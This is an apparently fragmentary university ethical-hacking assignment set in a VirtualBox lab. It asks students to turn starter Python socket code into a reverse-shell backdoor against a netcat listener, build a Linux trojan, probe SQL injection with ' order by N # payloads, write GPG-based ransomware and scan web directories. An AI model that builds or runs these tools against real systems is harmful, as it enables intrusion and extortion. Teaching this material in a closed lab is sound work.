Assignment CSCI369 SPR 2022 WG
Assignment CSCI369 SPR 2022 WG
Assignment
Due: 11:55 pm (Sydney Time) 28 October 2022
Total Mark: 100 (30% of Final Mark)
- You must create a folder (directory) for each question. – You will need to
create seven folders named as Q1,…,Q5.
- Answers for each question (which can be essays) need to be saved in each
folder.
- You need to have a VirtualBox installed on your personal laptop or
desktop. In the VirtualBox, you need to install at least Kali, Ubuntu and
Metasploitable2 virtual machines.
- You will have to take several screenshots of the results if asked. Those
screenshots will be checked thoroughly using hash checksum. If the same
checksum will be resulted from any files submitted by two different
students, all of them will get zero mark for the assignment.
Important note: You should submit your Python source codes with readme files
(for explaining how to run your program). Not doing so could result in a reduction
in the marks.
a) On your Kali machine, you (as a hacker) will run netcat to wait for
incoming traffic. That is, you run nc ‐v ‐l ‐p 5555 on the terminal.
(This means you don’t have to write a server program.)
b) The backdoor Trojan is, then, a client Python program that will
connect to your Kali machine waiting for the connection.
1
CSCI369 Ethical Hacking
This material is copyrighted. It must not be
C distributed without permission from
Joonsang Baek
d) You should start with the following Python code, which is a client
program based on Python socket package
(https://docs.python.org/3/howto/sockets.html ). – The code given
below just connects to the server, receives and displays a line of string
which is inputted by the server's user.
You should modify this code so that Linux commands you type will be
sent to the victim’s Ubuntu machine, executed there, and the result
will be sent back to your Kali machine).
import socket
kali_ip = "10.0.2.15" #This IP can be different on your virtual box
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((kali_ip, 5555))
s.send("Connected!\n".encode()) #encode() is needed to convert your
string input to bytes to be transferred over the network
received_data = s.recv(1024).decode() #decode() is needed to convert
your byte result to string to be displayed
print(received_data)
s.close()
Hint: Save the above code. On your kali machine, run the netcat (nc) command
described above. On the Ubuntu machine, run the above code and see what
happens.
Submit your Python source code named “backdoor.py” and readme.txt file
that explains how to run your program.
In the series of our labs, we learnt how to create a reverse shell for a
Windows machine. (We used msfvenom to generate a backdoor and
exploit it using Metasploit, creating a reverse shell.) It is harder to create a
reverse shell for Linux, but it is not impossible. Your task is to refer to the
following web article and create a reverse shell for Ubuntu (Linux) VM.
https://www.offensive-security.com/metasploit-unleashed/binary-linux-
trojan/
2
CSCI369 Ethical Hacking
This material is copyrighted. It must not be
C distributed without permission from
Joonsang Baek
You can use other graphic file formats, but make sure that it can be clearly
visible. Save all your files in the folder Q2.
a) In the input field of User ID, type ' order by 1 #. You will not get
any error. This means you have at least one column in the database.
Instead of 1, try any other number, say 10 (i.e., ' order by 10 #.
You will get an error this time. This means 10 is too big for the
number of columns. Keep trying this way to find out the exact number
of columns. How many columns are there? Your answer needs to be
saved in Q3-a.txt. (3 marks)
3
CSCI369 Ethical Hacking
This material is copyrighted. It must not be
C distributed without permission from
Joonsang Baek
You can use other graphic file formats, but make sure that it can be clearly
visible. Save all your files in the folder Q3.
4
CSCI369 Ethical Hacking
This material is copyrighted. It must not be
C distributed without permission from
Joonsang Baek
Write a Python program that does the above steps. You name your script
as ransom and save it together with your public key (the attacker’s public
key) in the folder Q4.
Submit your Python source code and readme file which explains how to
run your program.
Note 1: In step 2), you do not have to extract the key from key.txt. When
GPG asks a key for symmetric encryption, you can enter the same key you
have saved in key.txt.
Note 2: As this is (going to be) malware, you do not need to think about
the sanitization of the Linux commands. (Refer to Task 2 in Lab5.)
import requests
meta_ip ="10.0.2.4" #Your Metasploitable’s IP can be different
target_website = "http://"+meta_ip+"/mutillidae"
directory="documentation" #This is an example
# directory="addnews"
url = target_website+"/"+directory
response = requests.get(url)
print(response)
5
CSCI369 Ethical Hacking
This material is copyrighted. It must not be
C distributed without permission from
Joonsang Baek
Submit your Python source code and readme file which explains how to
run your program.
How to submit
Put your folders Q1,…,Q5 to one folder named as your surname followed by a
UOW student number, e.g. Greg5284611. Then, compress this folder to make one
zip file. – Note that only zip format will be accepted and other format may result
in zero mark for your assignment. Submit your (zip) file through Moodle.